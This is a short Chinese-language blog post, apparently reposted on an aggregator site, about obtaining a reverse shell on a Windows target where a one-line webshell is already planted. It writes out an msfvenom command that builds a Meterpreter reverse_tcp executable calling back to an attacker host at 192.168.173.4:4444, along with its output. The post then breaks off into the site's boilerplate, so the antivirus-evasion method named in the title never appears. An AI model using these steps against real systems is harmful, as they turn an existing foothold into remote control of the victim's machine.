概述
现在情况是已经上传了一句话木马,可以执行如:ls、pwd、whoami等命令;不管是python、bash 还是 perl 都反弹不了, 偷不了懒了,就上 msf 吧。
一、windows一句话木马反弹shell思路
前提:目标在有webshell权限下,利用kali的msf制作木马反弹shell过程。
启动kali中的msf
┌──(root@SC)-[~]
└─# msfconsole
生成exe类型反弹型木马,LHOST=kali 的 ip。
msf6 > msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.173.4 LPORT=4444 -f exe -o shell.exe
[*] exec: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.173.4 LPORT=4444 -f exe -o shell.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
最后
以上就是缥缈发箍为你收集整理的APT级全面免杀拿Shell的全部内容,希望文章能够帮你解决APT级全面免杀拿Shell所遇到的程序开发问题。
如果觉得靠谱客网站的内容还不错,欢迎将靠谱客网站推荐给程序员好友。
本图文内容来源于网友提供,作为学习参考使用,或来自网络收集整理,版权属于原作者所有。
发表评论 取消回复